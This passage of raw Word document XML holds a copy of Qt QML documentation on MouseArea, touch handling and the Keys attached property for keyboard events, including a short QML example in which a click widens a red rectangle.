          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId477" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type allows mouse and touch events to be handled in a QML application. A</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId478" w:history="1">
        <w:r w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>combined</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with either an</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId479" w:anchor="image" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Image</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or a</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId480" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId481" w:anchor="text" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object to implement a simple button.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</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2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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id</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root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width</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320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height</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480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t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#272822"</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width</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320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height</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480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t>
      </w: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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id</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rectangle</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x</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40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y</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20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width</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120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height</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120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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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anchors</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fill</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parent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onClicked</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rectangle</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width </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10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t>
      </w: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t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For more advanced use cases requiring multiple touch points, please read the documentation for the</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId482" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MultiPointTouchArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type and the</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId483" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PinchArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="0048415B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that some types have their own built in input handling</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example,</w:t>
      </w:r>
      <w:r w:rsidR="00507851">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId484" w:history="1">
        <w:r w:rsidRPr="00507851">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Flickable</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00507851">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>responds to mouse dragging, mouse wheel scrolling, touch dragging, and touch flicking by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="00507851" w:rsidRDefault="0048415B" w:rsidP="00507851">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="629" w:name="keyboard-and-button-events"/>
      <w:bookmarkStart w:id="630" w:name="_Toc483000664"/>
      <w:bookmarkStart w:id="631" w:name="_Toc483003681"/>
      <w:bookmarkStart w:id="632" w:name="_Toc483604017"/>
      <w:bookmarkStart w:id="633" w:name="_Toc483605237"/>
      <w:bookmarkEnd w:id="629"/>
      <w:r w:rsidRPr="00507851">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keyboard and Button Events</w:t>
      </w:r>
      <w:bookmarkEnd w:id="630"/>
      <w:bookmarkEnd w:id="631"/>
      <w:bookmarkEnd w:id="632"/>
      <w:bookmarkEnd w:id="633"/>
    </w:p>
    <w:p w:rsidR="0048415B" w:rsidRPr="0048415B" w:rsidRDefault="0048415B" w:rsidP="0048415B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Button and key presses, from buttons on a device, a keypad, or a keyboard, can all be handled using the</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId485" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Keys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached property</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This attached property is available on </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId486" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>derived types</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and works with the</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId487" w:anchor="focus-prop" w:history="1">
        <w:r w:rsidRPr="00D72F99">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::focus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to determine which type receives the key event. For simple key handling, you can set the focus to true on a single</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId488" w:history="1">
        <w:r w:rsidRPr="0048415B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and do all your key handling there.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048415B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
